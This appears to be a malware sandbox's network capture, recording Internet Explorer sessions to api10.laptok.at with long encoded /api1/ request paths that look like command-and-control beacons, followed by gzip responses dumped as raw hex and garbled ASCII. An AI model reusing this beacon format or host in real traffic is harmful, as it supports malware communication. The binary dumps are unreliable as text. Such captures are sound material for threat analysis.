                                                                                Feb 16, 2021 00:58:10.224896908 CET3153OUTGET /api1/soyCaKjlo/B74XWyII6dEV1I0Co4Ut/l9VT5RjBdu9gqXWslrY/xc_2FK3McGJ0IzvFP1vJkO/Am1fQoOyYzGbM/xK7yrntx/Hruw1HZvAcfYl7dS_2F5g51/rLGjgSsh9h/OW8nevv3Dh4VYPuXW/03beET_2FA3a/YKD8HGeNgat/jK8A9eho17ABaL/cUew4H72hIfxngPdnFseX/f9MvJYHFQTCCYMoN/XdpbU1hBHNX722p/DPf7k1CgkBZqmPOtaO/MB_2B0Lh_/2FdHYj_2Bx0ZSPs6m_2F/GelX35xSpPMKNfn0Q3D/54O_2FBBcuPBTrZpvB9zhY/7AC9yYriaqcnPDRgK/E HTTP/1.1
                                                                                Accept: text/html, application/xhtml+xml, image/jxr, */*
                                                                                Accept-Language: en-US
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                Accept-Encoding: gzip, deflate
                                                                                Host: api10.laptok.at
                                                                                Connection: Keep-Alive
                                                                                Feb 16, 2021 00:58:10.695950031 CET3155INHTTP/1.1 200 OK
                                                                                Server: nginx
                                                                                Date: Mon, 15 Feb 2021 23:58:10 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Strict-Transport-Security: max-age=63072000; includeSubdomains
                                                                                X-Content-Type-Options: nosniff
                                                                                Content-Encoding: gzip
                                                                                Data Raw: 32 30 30 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 14 9b 47 72 83 50 10 44 0f c4 82 9c 96 e4 9c 33 3b 32 08 10 88 0c a7 37 5e b9 5c b6 15 fe 9f e9 7e af ca 32 5a 92 58 bd c3 b3 ad 5f 41 52 c6 09 17 b1 36 d6 87 7b 19 67 96 45 82 56 ad 6a 44 6e 28 33 5e a6 77 10 c3 2d ea 6b 90 60 5f 0a 1d 88 64 ca 72 64 3f ad 1a e1 7b 51 60 10 c8 64 6b 84 05 ed c1 8c 20 51 6a 52 11 7e b2 9e 3d 18 a6 b3 a6 56 61 a7 e5 a8 e5 63 87 16 01 32 fc 47 4b 15 a2 0a f9 51 ce 05 27 cc 42 9b c3 d4 f5 b3 4b 35 64 92 02 40 7f 65 e3 d6 9c 1b a8 a6 51 3f 7e d4 d5 90 1f 4b d7 f7 6d a0 cf ae 19 22 f7 51 c4 75 fc 9d da 7c 03 ea 45 73 63 4c cc 0b ff 0d 81 24 b7 39 9b 7b 78 69 ae 14 2b ec 74 f6 5b aa 78 e6 8f de 13 6d 35 9d 4d 8f c1 d1 df a5 f9 f2 c1 85 a9 19 8c 64 a9 7c d2 c4 e2 7c 44 2e bd be db 84 54 b5 c4 87 93 94 35 3a ec e4 58 b5 52 5b 7a b3 2c 4d 19 bf cc ea 4d b4 f1 71 9a a2 5a 07 f0 ef c1 bd 2d 5c c3 86 50 40 8e 80 48 19 87 8f 1c 8f 74 7c 26 2a c2 29 1f 40 18 14 a7 0b 44 d0 39 7d 74 41 b1 f4 50 05 a3 ba fa 71 9b c4 0b 02 96 37 94 21 2e c2 2f 6a 98 ef 93 57 3f 95 c9 8f 3d cf 92 9b 07 20 20 2d 06 d0 69 ab b8 df 8d 28 ff b1 e1 b3 7e c9 44 4d 07 18 3e 80 d8 3e 77 7f 0d 64 3c aa d4 c3 ef 01 91 29 b3 33 32 b7 c5 18 ea ad 04 71 81 8a 9b 87 e7 40 69 0a 60 d7 ce 66 f5 b0 d8 2f 16 38 df 63 9f 4b e3 a6 b2 e0 7d 04 f3 f0 87 f4 fe 16 07 57 29 fd 42 60 08 74 0e 5e 7b b1 a1 56 8f 1c 38 63 9c 16 48 06 08 25 07 46 8c ee 8d 1e f5 11 4d 06 c0 6f 85 ef a7 96 5f 12 bb 82 22 31 88 a4 51 fa 44 b0 cd c1 d7 47 df d5 0f 40 cd 9e f4 34 1c fd 93 9e e9 c6 c7 f8 07 ab 0b 89 c2 fa 64 84 e0 5a 10 e1 31 02 e9 91 98 98 5b 92 12 d2 fc 1a 41 03 79 03 bb de bf 73 2f 22 1a 1a f1 48 f5 5e a8 67 d8 74 1f 84 ba bd 23 7b a2 e8 da 3e ad a8 8e 61 04 20 e3 6c 7e 0c 47 c4 f3 0a ff 78 fd b8 20 3a a1 48 e6 0e 90 14 a4 61 81 5a 75 de c6 d7 36 c7 00 57 92 08 f1 49 03 b5 72 a2 f8 44 c4 e3 3a 7a e6 ee a2 e3 33 50 ba a6 81 27 63 dd 13 f8 53 66 27 8f 61 1e 16 0c a5 8c 70 18 8f 60 26 a1 a2 d3 14 36 93 70 3b 64 da 52 44 8f a4 18 ca be 81 39 04 57 65 d1 b6 4d d8 f7 cc 68 61 a2 52 5c 2f 20 ea e7 d7 cf 3e f4 ab aa 43 69 c7 66 cb be cf 2f 70 2e 31 23 88 ad 10 7a e6 5a dd ef 69 e5 dd 88 4e f9 1c 4a 45 8b 7a 3f d4 9d 85 4e 3f f2 94 b1 a8 80 5d 36 a5 f8 dd dd ae 36 23 ef ff 00 1d 14 d2 b9 5c 7c a5 9b 02 66 1f 7f 74 3a 40 ed 77 ab 38 25 10 01 14 5f e2 8f bf d6 df 7e 20 b3 4b ad ee 62 66 c3 09 05 6e d1 95 75 6b 86 d5 b3 00 ca d1 4f b6 81 87 c1 ba c4 28 07 4c a1 62 2c 71 18 6e 49 d8 6d ce 0f ea d3 97 a2 7b bf ba 89 61 0f f7 e0 42 b7 5d 19 71 7b 20 82 4b 68 20 ce c7 fe 1a 3b a5 78 37 d7 da d6 71 35 d7 c7 31 b5 46 34 38 97 1f fb 09 8a d9 c6 86 66 04 ac 14 f9 f7 19 66 04 77 e8 af 23 49 48 2c 94 82 a7 93 f7 52 2d 12 22 ac fa 3d c1 66 0f 08 c1 ae 15 34 12 b5 a7 7b 9b 1d 03 b5 b7 e3 40 a3 91 1d 94 f6 a3 e5 e9 11 c4 91 75 bc 9f 2d 6b 8f fd 0c 2a b7 19 63 b8 f0 17 b3 9c 8e 60 b2 2e f8 3b 03 bd e5 07 c9 71 9b 50 46 81 d9 35 59 4e c7 44 07 25 7b e4 f9 c2 82 f0 fb 00 65 fa bb dc c5 05 05 74 bf 43 39 f1 a5 1e 8b 05 42 06 c9 7c 60 50 e4 2b a3 a4 2e 37 62 d3 dc 4d 7a 1e 8f 22 01 7d 19 87 3d 46 3c 4e 66 85 47 fe 95 7e 01 8a 2b 7c ca 9c 95 7f 8d c4 e4 fb 35 f7 30 f0
                                                                                Data Ascii: 2000GrPD3;27^\~2ZX_AR6{gEVjDn(3^w-k`_drd?{Q`dk QjR~=Vac2GKQ'BK5d@eQ?~Km"Qu|EscL$9{xi+t[xm5Md||D.T5:XR[z,MMqZ-\P@Ht|&*)@D9}tAPq7!./jW?= -i(~DM>>wd<)32q@i`f/8cK}W)B`t^{V8cH%FMo_"1QDG@4dZ1[Ays/"H^gt#{>a l~Gx :HaZu6WIrD:z3P'cSf'ap`&6p;dRD9WeMhaR\/ >Cif/p.1#zZiNJEz?N?]66#\|ft:@w8%_~ KbfnukO(Lb,qnIm{aB]q{ Kh ;x7q51F48ffw#IH,R-"=f4{@u-k*c`.;qPF5YND%{etC9B|`P+.7bMz"}=F<NfG~+|50
                                                                                Feb 16, 2021 00:58:10.695976973 CET3156INData Raw: b6 ac 32 f6 51 2d a2 c7 55 40 e0 f8 88 1a fa 56 15 a3 44 c1 e9 ef 66 7e 8e 96 67 ce 3e d7 c6 5d 4b e6 32 e3 7d e6 8e de ec a1 77 a7 e6 ac 5f 8d f9 25 4b fc 72 8b dc 1e a5 ce b5 f4 f9 46 2e 1f 63 a3 b9 38 95 01 a3 45 c4 68 68 b5 5b 97 9e bb 97 7d
                                                                                Data Ascii: 2Q-U@VDf~g>]K2}w_%KrF.c8Ehh[}JkI|}3+{PEjB0UD 3CC<GEalx>_-~?rN[Y;y-2 w$~!o(,R#!p=E
                                                                                Feb 16, 2021 00:58:10.695997953 CET3158INData Raw: 97 26 b5 9d e9 9d ab 60 df d9 aa 65 43 a4 29 d4 36 71 69 ca 81 22 4f ef 1f 37 79 81 59 ac 35 d9 44 1c 97 57 8f f1 a7 41 ce 13 ab 7c bf ec dd cf a4 8b bb b7 a9 b4 4c 28 d6 c3 25 5f 5d 80 be df a5 40 59 18 c7 c9 48 4c e2 14 99 91 2a f8 de b3 e8 cd
                                                                                Data Ascii: &`eC)6qi"O7yY5DWA|L(%_]@YHL*pxxk];=g@{6QfLxvJfaL=#&qy-VCxg|)*.tK*i`mZlR\=V
                                                                                Feb 16, 2021 00:58:10.696022987 CET3159INData Raw: 4a 16 c1 b7 ac 28 27 3c 6f c4 57 03 23 86 04 a6 11 d0 bc 24 27 3a 56 05 44 df 0a 8c c7 05 37 dd 97 36 2b 3a 5c 9c 03 84 21 28 ae 86 c0 b2 62 3d c3 ab 24 36 e2 c0 e8 6c 79 d6 77 ea c3 ef 42 90 e9 a7 25 6f b4 06 72 84 74 c0 f7 bc 62 ec dd f2 58 b1
                                                                                Data Ascii: J('<oW#$':VD76+:\!(b=$6lywB%ortbXyH&is<Br*%^C4cKR<b_+l40H(Gr\ZJ`vIgN:k_<:d!&Q)&>[!J_Pbnxu
                                                                                Feb 16, 2021 00:58:10.696044922 CET3160INData Raw: 25 e2 d8 29 be d5 c4 4b 52 0c a9 3f c1 7e d0 b0 3d 90 b0 9f 53 17 95 db cb 64 57 0f 0c 83 93 6d 06 6c 8b e7 a0 b0 58 09 bb cf 0e bb e4 62 36 a5 aa 80 bc 00 01 8b db 97 6f d0 a1 6f c7 c5 74 20 f2 8f 85 21 fb b7 64 c5 25 7c 18 af c7 c8 5a b3 1e 81
                                                                                Data Ascii: %)KR?~=SdWmlXb6oot !d%|ZE<<UetOx;\#V'09.c^=#hynUGM_by$}Fy{4?fFC.\|^gJ^fM^?u-+#K`%JtfBP+Od71
                                                                                Feb 16, 2021 00:58:10.696065903 CET3162INData Raw: 29 c5 2d 2a 00 64 d5 07 1c c8 c2 0d 5a 36 1d 93 45 de ec 7e 81 b1 ad e0 29 3f 2d 54 14 bb 6e 06 dd 1f 5b 19 21 bb 3b 2b f8 46 ed 72 22 d9 8d c8 00 ba e6 20 0b 84 89 0b 0c 00 0d 4f 78 9f c3 06 28 6c 1e 2d f5 0f f4 d5 a2 73 ca 11 fd 5c 16 ab 50 ce
                                                                                Data Ascii: )-*dZ6E~)?-Tn[!;+Fr" Ox(l-s\PFxsWH|[X}l-suEdx#qcAvghaAvy@AkMl-S:inP$dySs w1="z)[nd3{2';
                                                                                Feb 16, 2021 00:58:10.734838009 CET3163INData Raw: f0 08 09 ea 03 0b 4b 21 56 52 55 ed 1d cc da d0 54 eb 16 ba 84 3b d8 12 00 4d 73 e7 c1 7e 05 10 0e 5a e3 a2 a3 9a 60 3b 4a 28 a6 eb 4a 5b 12 79 4c 68 8a 31 1c 51 eb 71 76 9c ae 73 5e 02 92 ad 57 7c 9d 91 71 e0 26 e6 58 5a 40 ef b9 e4 33 b4 38 0c
                                                                                Data Ascii: K!VRUT;Ms~Z`;J(J[yLh1Qqvs^W|q&XZ@38u<{slMlW K^"@53-Vto1!mra5eXs48K=wEWvAuPuwrkPBHQ.o4e a
                                                                                Feb 16, 2021 00:58:10.734863997 CET3164INData Raw: 60 66 b3 ea aa 58 8b a5 de 43 c8 b4 1e 56 a0 da b6 b1 34 08 cb e5 3b c7 b5 89 aa 71 bd 4a d8 7b 8f 09 58 21 64 64 4a 25 96 18 fa f4 06 56 7c 6f 3e 72 22 9a b4 93 e4 2b 29 e0 46 52 87 cd 7c 2c af f0 76 ec 2b a2 3d 6c a9 17 1d 8a 31 b9 63 a4 d2 18
                                                                                Data Ascii: `fXCV4;qJ{X!ddJ%V|o>r"+)FR|,v+=l1c)bE'.y<?`;WL$>!gEugl 5n.zfDPdX6Z%y'c~ZJ%W|npN~7/WaO ND:E3fj6EIO
                                                                                Feb 16, 2021 00:58:10.734880924 CET3166INData Raw: a2 d3 70 e1 b1 e6 71 58 f9 63 a1 be 0f d8 d1 0d f5 59 9f 31 7a c1 ab 9e 89 a3 dc d3 b4 5c a7 41 36 10 f2 7c f8 33 2e 64 cc 7b 57 72 d6 54 6e 1a 8c ce e8 9b 13 3a 5f 1b 62 e7 f8 11 80 3e d8 dd 50 79 a4 fe b1 c7 29 c6 8a 99 e1 7f 5d 82 d5 ed 5e d1
                                                                                Data Ascii: pqXcY1z\A6|3.d{WrTn:_b>Py)]^'7R/Q|?*>*7e9bg_gtw"A}=9fcdP8oFXD0!7=Dnt]F3*SZ}L/3tCxn,Z@o=Y~~`/l
                                                                                Feb 16, 2021 00:58:10.734896898 CET3167INData Raw: 5c fa 90 b8 57 0c 74 e8 b7 35 f1 09 fc 0f f0 a4 10 25 d2 ea 65 c8 61 a8 f4 4a 8c 2e 72 f2 23 8e 7c 03 40 fa f6 29 90 eb db b5 22 a1 72 7a 9e ad a0 99 07 f0 34 ec 56 61 01 ee ba 06 32 dc 13 80 4c 46 02 60 d8 7f 8b 95 4a 75 3e 1c 50 e1 d5 45 03 75
                                                                                Data Ascii: \Wt5%eaJ.r#|@)"rz4Va2LF`Ju>PEu2 Cg.mF5!L&]7~Y:$L;DCfmwnlv QA}IhG^0!zWKA8^c
                                                                                Feb 16, 2021 00:58:10.742747068 CET3169INData Raw: 3a 78 28 96 e7 e9 c1 38 28 ee ef 24 12 eb eb 74 e1 c7 ea a9 ad 5d 6a 19 d3 60 3c e1 ba a9 57 5a a4 7b 14 8b 48 50 ff fd b7 7b f6 fd bd b4 c1 1f c8 f6 70 e0 c9 9d 04 16 c1 2c a3 7d d9 f4 5b 66 d3 99 f2 cb 84 b9 f7 d7 05 31 eb fb d5 6c 62 f5 2b 42
                                                                                Data Ascii: :x(8($t]j`<WZ{HP{p,}[f1lb+B.4Vbth~v}!. @1{ketvRXcs`1(80O)VG'rn*p>4?& PA)"'9]SKQq+9$9R03`k:F+e>kUsE


                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                1192.168.2.44977634.65.144.15980C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                TimestampkBytes transferredDirectionData
                                                                                Feb 16, 2021 00:58:11.253958941 CET3368OUTGET /favicon.ico HTTP/1.1
                                                                                Accept: */*
                                                                                Accept-Encoding: gzip, deflate
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                Host: api10.laptok.at
                                                                                Connection: Keep-Alive
                                                                                Feb 16, 2021 00:58:11.377232075 CET3368INHTTP/1.1 404 Not Found
                                                                                Server: nginx
                                                                                Date: Mon, 15 Feb 2021 23:58:11 GMT
                                                                                Content-Type: text/html; charset=utf-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Content-Encoding: gzip
                                                                                Data Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30


                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                2192.168.2.44978034.65.144.15980C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                TimestampkBytes transferredDirectionData
                                                                                Feb 16, 2021 00:58:13.894741058 CET3484OUTGET /api1/ACRDYIo3vDDkE8nBO7rZ_2F/RKqyjTnG2z/bw24fKr8FPY8iC_2F/NOd8pP1qrd_2/B0zRVNFer70/12v4aw2Bat1oWp/EdxqaQHccPmd48WBI_2Fh/ZsZf5oFs1F5WVpMV/Aql6isAZLQXMGYV/uCpbF51_2FaHU68PIY/HN1L8Jeq6/71Of32mfKV_2FEsbc40d/blSVHi4z_2F2u7ZVT2S/LNeMbeXi5H54yUd71Yke04/YvCLg_2BV_2FO/HHmC2v0g/tP9YiJq20QZR4sjpPzGs48R/leCqM3qCaD/cvMCdxcgqejP1dFql/2a73eaCZuJLy/90fQzPpEVBC/OzDkRB7t1Aba9y/CFI HTTP/1.1
                                                                                Accept: text/html, application/xhtml+xml, image/jxr, */*
                                                                                Accept-Language: en-US
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                Accept-Encoding: gzip, deflate
                                                                                Host: api10.laptok.at
                                                                                Connection: Keep-Alive
                                                                                Feb 16, 2021 00:58:14.372047901 CET3549INHTTP/1.1 200 OK
                                                                                Server: nginx
                                                                                Date: Mon, 15 Feb 2021 23:58:14 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Strict-Transport-Security: max-age=63072000; includeSubdomains
                                                                                X-Content-Type-Options: nosniff
                                                                                Content-Encoding: gzip
                                                                                Data Raw: 32 30 30 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 14 9b c5 7a 83 50 10 46 1f 28 0b dc 96 b8 4b 70 d8 21 c1 dd e1 e9 4b bb ec 97 92 70 ef cc 3f e7 90 5b bc 31 37 2b 68 26 65 55 4b 91 92 ab 92 ab e1 70 70 58 e5 e7 58 97 69 84 d0 e0 93 41 f4 11 d9 40 08 ee b9 6c 9a 02 4f 18 29 46 c5 1e a1 02 11 c1 8c 8e 6e 3a 47 d0 cf 75 10 ad 31 a4 03 6d d4 01 5f b3 87 30 b7 92 73 d8 f0 49 a6 93 bb 09 40 18 89 cb 85 e6 82 86 12 9a 05 a8 f8 f5 cb 7a 3f 34 32 08 3b 7b f4 4a 28 04 c6 51 78 e0 f7 4b a4 29 9d be e6 8d 84 a1 a2 b1 3c ab eb 88 92 9c fe ad ca 58 cd 29 b2 90 6f a4 66 83 39 58 b9 10 b5 96 04 22 8f 23 60 36 31 b8 ee b9 85 d5 f5 65 ae 8e c7 5a 9f 8f ec 16 3a c6 85 9f df 19 86 86 53 f6 48 f2 c4 1d c4 cf 5a 30 71 54 14 07 3d 64 95 8a 36 6f 75 43 20 1f e0 c7 6e d2 37 ef bd 8f 20 cc 1e f7 45 c2 61 6a 57 22 68 0a b5 ce 46 15 39 aa 2b 7a 8a fd 94 78 84 f6 58 dd 2f 9f 53 e0 9f 76 68 d8 1f b5 cb 69 67 69 d7 7c 05 ba 87 2b 1a 37 fd 1c 37 cd ee 2b 55 cb b2 5d a6 8f 49 52 31 2f 7c 52 27 9b b0 81 52 32 a8 58 e5 56 a7 8c ec 84 b0 ef 06 46 ee e5 03 7a e9 c3 70 c8 5d 2c 54 b9 41 a8 7f 77 43 3a bd e7 37 bb 85 70 54 30 fe 61 8c 4b 07 ac d3 c0 6e 53 a9 7e 4f 62 c4 d3 77 22 66 6a e3 1c 63 6d 73 ce 2d b6 7b 46 55 72 2c d4 92 8d 0f 08 7b fa 4f 87 ed 04 a0 67 39 36 5c a7 67 05 58 b0 86 09 51 a7 d4 d7 9a ba 4a 00 71 24 39 1a 3b a1 85 c0 9f 92 de 62 da af 05 19 90 33 ca a9 61 08 6b f9 48 9d 44 50 a5 95 30 e7 8e 84 50 ce d3 3f 24 ed ec bd d7 c4 68 21 4d 7a e5 cf 23 35 fd 4b 39 b4 0a 9f 09 0c 61 f4 23 6e 42 31 77 db 0f 95 0b f7 9e 72 09 d4 4c 1a b7 71 10 81 1f 46 f2 f9 b8 67 b9 2f 32 92 b3 72 7a 9e 62 7b b9 1f 87 60 b6 96 7d 60 6f f5 3b 12 18 af e3 33 dd fe ec ee 42 a0 18 8c bf 36 bd ce b8 d2 67 c4 eb eb b9 af 08 6d d9 f1 0b a1 0a 12 e0 7a 40 7e 9d 6c 1b 68 07 f6 1c cc eb 1e 26 67 6b 9e 90 be c6 30 12 20 8c ff 48 01 c6 ed 69 ad e9 3e 6b 36 fe 37 7f 11 b2 a1 07 37 e5 0a b3 07 f6 cf ca 44 5c 6a fe e8 73 62 1a 4d 04 b8 e5 fe e9 c8 b7 a6 4e c2 c4 b5 bd 11 b1 3a 61 ad c5 f7 ae 52 aa 02 0c c0 47 dd 26 d7 7c d3 dc c8 39 11 de 3e 14 2b 8f 67 60 da 3e 93 39 3b fe e0 72 45 7d 19 c7 f6 ae 4b 54 d5 bc 7a ee ce 2d 16 d8 f0 95 6e 7b d9 43 c8 3d ee 8f 21 8b 16 f0 b1 dc e9 21 97 6c b6 91 c9 f2 22 8e e3 62 9a 78 4a d4 85 64 20 82 8f 3d 86 b2 c5 a1 63 5a b9 f1 24 3c 15 0e 0c 1d fa e0 9f f0 44 4c 46 2a 06 99 d9 20 94 73 a7 69 de d5 7d f6 95 64 78 18 70 f9 1d 17 62 90 12 29 7a 9e 3c 64 df ba 43 13 a3 45 75 4b 6c 31 0b 9d 15 b3 b6 da af eb 2f 9f 24 96 7a 29 c2 c3 59 2b 5a f8 94 eb a5 ae a2 79 ef f2 0f 3d b2 41 a1 9e a6 64 41 14 51 c6 3b db a6 f7 28 21 67 6d 0a 1e ae ef f7 f0 cb 21 2a eb 88 6d ea 96 b9 6b 1c 33 e3 ad e8 5e 10 85 50 33 e2 b7 37 bf 25 1f b2 2e 16 fa 4b 05 6f b7 25 01 e7 bb 5d 47 a7 08 1b ea f4 2a 21 91 00 56 3f 19 17 7f e4 1b 32 16 64 ce 8c e5 a3 80 4e 42 95 ec 41 17 c1 79 41 78 39 5f b8 00 e5 f1 85 25 c4 00 22 05 28 48 86 e4 3b 36 7d a9 ee fd c3 b2 2a 59 81 f0 58 0e 2b d4 b1 2c 39 b1 b8 14 1b e1 0b e5 93 19 90 f2 86 ed 75 aa c7 96 ef 32 d5 a9 07 71 07 83 ed 7e 84 7b b5 0a 43 15 e0 41 3d 30 5c 93 92 78 35 ed 01 59 d1 6a e9 9d 3a 23 f2 df 07 aa a1 21 41 eb 00 72 e7 d9 83 61 45 1d a2 35 0f 35 d1 e6 bc
                                                                                Data Ascii: 2000zPF(Kp!Kp?[17+h&eUKppXXiA@lO)Fn:Gu1m_0sI@z?42;{J(QxK)<X)of9X"#`61eZ:SHZ0qT=d6ouC n7 EajW"hF9+zxX/Svhigi|+77+U]IR1/|R'R2XVFzp],TAwC:7pT0aKnS~Obw"fjcms-{FUr,{Og96\gXQJq$9;b3akHDP0P?$h!Mz#5K9a#nB1wrLqFg/2rzb{`}`o;3B6gmz@~lh&gk0 Hi>k677D\jsbMN:aRG&|9>+g`>9;rE}KTz-n{C=!!l"bxJd =cZ$<DLF* si}dxpb)z<dCEuKl1/$z)Y+Zy=AdAQ;(!gm!*mk3^P37%.Ko%]G*!V?2dNBAyAx9_%"(H;6}*YX+,9u2q~{CA=0\x5Yj:#!AraE55
                                                                                Feb 16, 2021 00:58:14.372087955 CET3550INData Raw: 84 17 f4 df 16 1f db 93 1a 2d b0 ed 95 2f 43 dd 86 36 c3 8f 2c fd af a1 07 95 4a af 38 6a 58 d1 b7 5a 35 a5 6d aa 62 db bd 4f ad 33 f2 43 7e 76 32 bd a0 0a fa 9d c6 e0 e7 bf ab 43 50 df 9f 9c 3e 12 af 6e 32 5c 64 c7 39 d1 97 ad a7 3f e3 37 47 3a
                                                                                Data Ascii: -/C6,J8jXZ5mbO3C~v2CP>n2\d9?7G:OX!y=d*ot-E"NmZ1<NZ>k'O">z3@ \6H#}O*!pn"\"DgxcH)>Dz$wCH.E
                                                                                Feb 16, 2021 00:58:14.372144938 CET3551INData Raw: 84 11 57 7c 42 21 64 da a4 47 59 85 ea 01 05 9c aa fd d8 5e 64 c8 d2 82 55 72 ff 81 22 52 ff f6 26 7a b1 f2 bd 53 e1 67 9d d3 62 27 e5 c4 da 4e ce e1 a7 74 68 93 e8 ee 0b 81 b8 f5 fc e1 f9 85 87 e9 4a 32 85 fd 4c b7 67 8f aa 49 08 9a f8 c1 b7 f9
                                                                                Data Ascii: W|B!dGY^dUr"R&zSgb'NthJ2LgItoNBt7aq9<2&2t_KorC5k+Q%5h9B(8^x!NM,E,g`==9zYf(48Sw|MyHZV.@8Q%>$1.
                                                                                Feb 16, 2021 00:58:14.372186899 CET3553INData Raw: 13 07 1b 5a da d5 1a cb 03 a4 9c 80 81 2d f4 f2 86 28 84 16 59 6a a2 af c6 f4 30 6e 4c 5b c5 c8 ba 96 af d1 3b 3d 1a 23 c4 ba 0c 67 60 26 74 30 dc 76 0b 11 b5 05 7d 1e 19 70 1f b3 d0 e8 2b 6a 18 67 67 47 61 b3 b4 ae 6f 66 b3 46 84 c8 94 3f 66 b4
                                                                                Data Ascii: Z-(Yj0nL[;=#g`&t0v}p+jggGaofF?fL$=OU.S>8cq#jdbGs$3Iwm*;}kwB4I}#$MDG-CGqv]Mz7:@R2oR|P]8*=[_Nd~H7:@u=M2
                                                                                Feb 16, 2021 00:58:14.372231007 CET3554INData Raw: bb a6 bc eb ac 2e e5 16 e7 e1 5c 4b 85 ea d4 b2 55 74 93 b8 91 8a 06 65 5f 84 83 1b d4 73 00 36 83 dd cd 81 ce 5a 11 c5 96 35 a3 92 3b 90 81 3d 51 c6 7d ef 09 19 2b 1d 0c 02 d7 f9 09 9e ce 55 f5 b9 76 c5 7e 02 b8 9d 9b b4 f1 08 d5 ae 9f 63 d4 8a
                                                                                Data Ascii: .\KUte_s6Z5;=Q}+Uv~cXcL}W' xwU"'ITi?;IhRFJlf~Fh*bTKf3q~NR]D-8f!F&Q?yF4rUs^H7l2pUyW6S;q)=
                                                                                Feb 16, 2021 00:58:14.372277021 CET3556INData Raw: f8 8b f0 a4 64 22 aa c9 9e e4 63 4f 27 7e 15 78 21 ff e8 50 ef da 76 94 2b 6c 4c f6 e9 6f 74 4f d5 be e2 00 51 48 26 66 f1 7a 61 ab 48 31 47 0e 71 cb 9b 6b 89 f6 51 7e 9c c9 5d d1 af f7 2b 9a 94 ad c9 fb 64 80 d0 d2 b1 9c 28 84 c0 73 db f7 8b 35
                                                                                Data Ascii: d"cO'~x!Pv+lLotOQH&fzaH1GqkQ~]+d(s5pK+A/@A:S :p27$ALXc^Cr=x,"vr;o`Qj49C )hP2)B1+3W%,&#lv,\!|X$Ih
                                                                                Feb 16, 2021 00:58:14.412328959 CET3558INData Raw: 0c f5 e2 d6 0a 0c e6 f6 7b c8 bd 22 f8 37 dd 18 39 c8 7e 9e da 61 dc 6e 90 26 ec d1 ac 7e b6 4f 11 06 d1 fd 0c 61 7a ca fc 55 82 9f 9b 01 9c 0b 11 43 83 e5 76 a7 4d 5e fe 2b a0 3d 6c 7b c2 b7 91 03 c8 9a 2e b2 f9 43 16 59 4b 42 57 05 b1 0f 97 a9
                                                                                Data Ascii: {"79~an&~OazUCvM^+=l{.CYKBW"_I^@O9BC Nw|UU {09(LT9o2HJahtrq9f?K10XHq7$?G@6'YFcU70KnteJ:;^+%x?~R/?
                                                                                Feb 16, 2021 00:58:14.412411928 CET3559INData Raw: a2 10 8d 6f b8 90 37 35 13 8b 42 b7 70 cf 7f 1c 42 b3 e0 9f 26 28 c2 ac 42 3f 63 b2 50 ba 8b 5b 90 ea 34 5c a3 3c 1d f9 c8 2e ad 34 77 05 c5 06 22 5e 52 51 67 ab 4f 32 8e 6e 5a 6a 85 56 32 50 bf 1d 80 a4 08 6b e6 84 d7 ed 0c 2f ff 98 de b1 a1 e6
                                                                                Data Ascii: o75BpB&(B?cP[4\<.4w"^RQgO2nZjV2Pk/RcQ(r!_~c[G#V'['6>d'|fS:Mn}E\ne=&,"*|tSQ]0xEI\~v8ems6W1fX<L}|'<vhJj^N
                                                                                Feb 16, 2021 00:58:14.412475109 CET3560INData Raw: 4d a4 4b b0 5a b7 f3 7d b9 9d ab 2a 62 f4 05 e2 96 c5 f9 ff 4b b4 c3 a3 7a 93 d6 eb 0b a3 59 de b3 5b fb a7 5d 86 e0 c9 dc 38 8a 7c 17 f0 35 52 f6 90 77 89 5f 52 f0 e7 b7 8f 85 53 56 20 4c e2 aa 9e 3d fa 8a d4 35 1f 6f f6 68 b0 62 16 44 a7 4d 0e
                                                                                Data Ascii: MKZ}*bKzY[]8|5Rw_RSV L=5ohbDM|Z?oc!xg!gSg;6E1-vK5M98=g{K8E{+m0rIP+/HksvFFT~A*>"!\m=4JCgTz-
                                                                                Feb 16, 2021 00:58:14.412533998 CET3562INData Raw: 70 ee 5d 80 29 b7 a4 05 0a de 5f 87 52 d8 e4 5d 50 5f 3f 27 81 63 75 59 87 5a f8 6e 11 7a 17 1f 3c cc a2 d6 91 f4 56 aa 96 d3 7f a3 f8 fe e4 71 eb 8f 69 14 6e bf b7 72 a7 1c 00 b2 2d 29 f7 85 11 f7 34 d3 d2 e9 a1 4b a1 07 7b 5c 4f ea 2f e6 82 e3
                                                                                Data Ascii: p])_R]P_?'cuYZnz<Vqinr-)4K{\O/y.""07>#}-X34Nsj$~i`*X~0t*E1Cu "Tu'.\ImTHG%qB8)
